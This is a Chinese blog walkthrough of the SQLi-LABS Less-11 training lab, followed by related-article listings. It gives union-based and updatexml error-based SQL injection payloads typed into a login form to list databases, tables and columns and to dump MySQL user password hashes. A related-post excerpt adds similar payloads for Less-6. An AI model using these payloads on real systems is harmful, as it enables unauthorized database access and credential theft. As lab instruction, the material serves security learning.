SQLi LABS Less-11 联合注入+报错注入_sqli-labs第11关

最新推荐文章于 2024-12-07 22:47:31 发布
原创 最新推荐文章于 2024-12-07 22:47:31 发布 · 377 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#less #oracle #前端

用户名输入:a’ union select 1,2 – a

密码随便输入:1

第四步、脱库

获取所有数据库,用户名输入:

a' union select 1,(
    select group_concat(schema_name) 
    from information_schema.schemata 
)  -- a

密码随便输入:1

获取 security 库的所有表,用户名输入

a' union select 1,(
    select group_concat(table_name) 
    from information_schema.tables
    where table_schema="security"
)  -- a

密码随便输入:1

获取 users 表的所有字段,用户名输入:

a' union select 1,(
    select group_concat(column_name) 
    from information_schema.columns
    where table_schema="security" and table_name="users"
)  -- a

密码随便输入:1

获取数据库用户的密码,用户名输入:

a' union select 1,(
    select group_concat(user,password) 
    from mysql.user where user = 'mituan'
)  -- a

密码随便输入:1

方式二:报错注入

推荐文章:报错注入使用详解 原理+步骤+实战教程

第一步、判断是否报错

用户名输入:a’

密码随便输入:1

页面显示数据库的报错信息,适合使用报错注入。

第二步、判断报错条件

用户名输入:a’ and updatexml(1,0x7e,3) – a

密码随便输入:1

页面正常显示报错信息,确定报错函数可以使用。

第三步、脱库

获取所有数据库,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(schema_name)
		from information_schema.schemata
	),33,31)
),3) -- a

密码输入:1

获取 security 库的所有表,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(table_name)
		from information_schema.tables
		where table_schema="security"
	),1,31)
),3) -- a

密码随便输入:1

获取 users 表的所有字段,用户名输入:

a' and updatexml(1,concat(0x7e,
	substr((
		select group_concat(column_name)
		from information_schema.columns
		where table_schema="security" and table_name="users"
	),1,31)
),3) -- a

密码随便输入:1

获取数据库用户的密码,用户名输入:

a' and updatexml(1,
	concat(0x7e,(
        select group_concat(user,password) 
        from mysql.user where user = 'mituan'
    ))
,3) -- a

密码随便输入:1

2401_86951418
关注
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十,sqllabs less-20,sqli-labs less20
sqli-labs less-11 & less-12
water0diamond的博客
03-17 1053
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10都是get型的,而从现在开始我们进入post型卡 post是一种数据提...
SQLi-LABSLess -11 注入思路以及过程
m0_52513952的博客
02-22 3305
less 11sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
sqli-labs (less-11)
kukudeshuo的博客
03-09 3601
sqli-labs (less-11) 补充知识 从第11开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs(less-11)
m0_59092234的博客
07-31 192
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦。...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1894
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL注入实例(sqli-labs/less-11
Thewei666的博客
08-06 350
【代码】SQL注入实例(sqli-labs/less-11
SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
2401_84264536的博客
06-20 199
【代码】SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4390
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs less-11
爱党人士
06-15 864
1-10就是get,这个是post,会post就肯定会get的啦。 实验环境: firefox hackbar(这个是另一个版本,因为最多人用的那个版本要收费了) less 11: 随便输点东西 url栏没有什么变化, 肯定是post,用hackbar。 快速查看元素技巧: uname和passwd(这个在username右边的编辑框右键查看元素即可看到) 不出所料, 下面就是要对其进行判...
sql-labs_Less11-14
soldi_er的博客
03-28 334
文章目录场景Less11:基于error和print查库过程源码分析Less13:基于error查库过程_使用extractvalue()进行xpath报错注入查找完整的列名和列值源码分析复习xpath的两个报错函数extractvalue(1,xpath_string)updatexml(1,xpath_string,1)参考 场景   登陆框 Less11:基于error和print 查库过程   Less12的闭合方式是’),不再赘述。   右键查看前端源代码,看到uname和passwd参数,
sqlilabs靶场:less-11--less-15
2302_80256359的博客
12-07 833
sqlilabs靶场第11到第15超详细步骤
sqli-lab靶场学习(四)——Less11-14(post方法)
sadoshi的专栏
09-20 546
1-10都是get方法,本开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
sqli-labs的sql注入——基础挑战之less11
Eternity18的博客
11-27 834
sqli-labs学习,less11SQL注入
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二sqli-labs less-12,sqlilabs less12
sqli-labs 靶场 less-11~14 第十一、第十二、第十三、第十四详解:联合注入、错误注入
Superstacks超全栈
06-09 877
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 921
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
sqli-labs笔记(less-11 ~ less16)
weixin_44533365的博客
01-22 719
上一篇文章说了sqli-labsless-1less-10的注入方法,这一篇从less-11开始。
sqli-labs-masterd第六报错注入查数据
最新发布
03-30
<think>好的,我现在需要解决SQLi-Labs第六报错注入问题。首先,我应该回忆一下第六的基本情况。根据用户提供的引用内容,第六是基于GET提交的双引号闭合的报错注入。之前第五是单引号闭合,而第六可能换成了双引号,所以闭合方式不同。 接下来,我需要确定注入点。用户提到的第六需要判断注入点是否正确。通常,我会先尝试在参数后添加一个双引号,看是否引发数据库报错。比如,访问?id=1",如果页面返回语法错误,说明可能存在双引号闭合的漏洞。根据引用[5],第六确实是双引号闭合,所以这一步应该是正确的。 然后,我需要确认报错注入方式。常见的报错函数有updatexml()、extractvalue()等。比如在第五使用了updatexml,如引用[4]中的示例:?id=1' and updatexml(...)。但第六是双引号闭合,所以闭合方式应该是"而不是'。因此,构造payload时需要用双引号闭合,并注释掉后面的部分。例如:?id=1" and updatexml(...) --+。这里要注意注释符的使用,可能用%23(#的URL编码)或者--+来注释。 接下来是获取数据。假设已经确认注入点,接下来需要构造查询来获取数据库信息。例如,获取当前用户,可以使用:?id=1" and updatexml(1, concat(0x7e, (select user()), 0x7e), 1)--+。这里的0x7e是波浪号~的十六进制,用于分割结果,使报错信息中显示查询内容。根据引用[4],类似的payload在第五有效,第六应该类似,只是闭合方式不同。 但需要处理数据截断的问题,因为updatexml报错只能返回32位长度,所以如果查询结果较长,可能需要用substring或limit分次获取。例如,获取数据库名:?id=1" and updatexml(1, concat(0x7e, (select database()), 0x7e), 1)--+。然后继续获取表名、字段名等。 另外,根据引用[3],第八没有报错信息,但第六可能有报错回显,所以可以依赖报错信息来提取数据。如果遇到无回显的情况,可能需要时间盲注或其他方法,但第六应该支持报错注入。 还需要注意用户提到的引用[5]中的通思路,包括判断注入点和payload构造。例如,在第六中,闭合是双引号,所以参数应该是"加上注入语句,然后注释掉剩余部分。比如:?id=1" and (payload)--+。 总结步骤:1. 确认注入点为双引号闭合;2. 使用报错函数如updatexml构造payload;3. 逐步获取数据库信息,处理截断;4. 最终获取目标数据如用户名、密码等。 可能存在的问题:是否双引号闭合需要验证,或者是否有其他过滤措施?比如,是否存在对某些键字的过滤,是否需要绕过。根据用户提供的引用,第六似乎没有提到过滤,所以可能直接使用报错注入即可。 另外,注意语法正确性,比如闭合双引号后是否需要平衡括号,或者是否存在转义字符的问题。例如,在双引号闭合后,后面的语句需要用注释符注释掉原SQL的剩余部分,避免语法错误。 测试payload时,需要确保拼接后的SQL语句正确。例如,原语句可能是SELECT ... FROM ... WHERE id="输入" LIMIT 0,1。当输入为1" and updatexml(...) --+时,整个语句变为WHERE id="1" and updatexml(...) --+" LIMIT 0,1,这样注释符会注释掉后面的双引号和LIMIT部分,避免语法错误。 如果报错信息显示语法错误,可能需要调整闭合方式或注释符的使用。例如,使用%23代替--+,因为有时URL中的+会被解码为空格,而%23是#的编码,注释效果更可靠。 最后,根据步骤逐步获取所需数据,可能需要多次注入,每次获取部分信息,直到得到完整的数据库内容。</think>### SQLi-Labs 第六报错注入解决方案 #### 1. 确认注入点与闭合方式 第六为**双引号闭合**的报错注入。通过以下步骤验证: - 输入 `?id=1"`,若页面返回语法错误(如引用[2]所示),则确认闭合方式为双引号。 - 示例报错:`You have an error in your SQL syntax... near '"1"" LIMIT 0,1'`[^2]。 #### 2. 构造报错注入Payload 使用 `updatexml()` 函数触发报错并回显数据: ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1)--+ ``` - **键点**: - `0x7e` 为 `~` 符号的十六进制,用于分隔报错内容。 - `--+` 或 `%23` 用于注释后续SQL语句(如 `LIMIT 0,1`)[^4][^5]。 #### 3. 分步获取数据 ##### (1) 获取数据库名 ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT database()), 0x7e), 1)--+ ``` 报错回显示例:`XPATH syntax error: '~security~'`,表明当前数据库为 `security`[^1]。 ##### (2) 获取表名 ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0x7e), 1)--+ ``` - 调整 `LIMIT` 参数遍历所有表(如 `emails`, `users` 等)。 ##### (3) 获取字段名(以 `users` 表为例) ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1), 0x7e), 1)--+ ``` - 遍历 `LIMIT` 获取字段名(如 `id`, `username`, `password`)。 ##### (4) 提取数据(以 `username` 和 `password` 为例) ```sql ?id=1" and updatexml(1, concat(0x7e, (SELECT concat(username, ':', password) FROM users LIMIT 0,1), 0x7e), 1)--+ ``` - 报错截断处理:若结果过长,使用 `substr()` 分段获取: ```sql ?id=1" and updatexml(1, concat(0x7e, substr((SELECT password FROM users LIMIT 0,1), 1, 20), 0x7e), 1)--+ ``` #### 4. 绕过长度限制的技巧 - 使用 `mid()` 或 `substr()` 分段读取字段值。 - 示例: ```sql ?id=1" and updatexml(1, concat(0x7e, mid((SELECT group_concat(username) FROM users), 1, 30), 0x7e), 1)--+ ``` #### 5. 注意事项 1. **闭合完整性**:确保双引号闭合后通过注释符 `--+` 或 `%23` 截断原SQL语句。 2. **错误处理**:若报错信息不完整,调整 `concat()` 参数或使用 `offset` 跳过已获取的数据。 3. **编码问题**:特殊字符需URL编码(如空格用 `%20`, `#` 用 `%23`)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值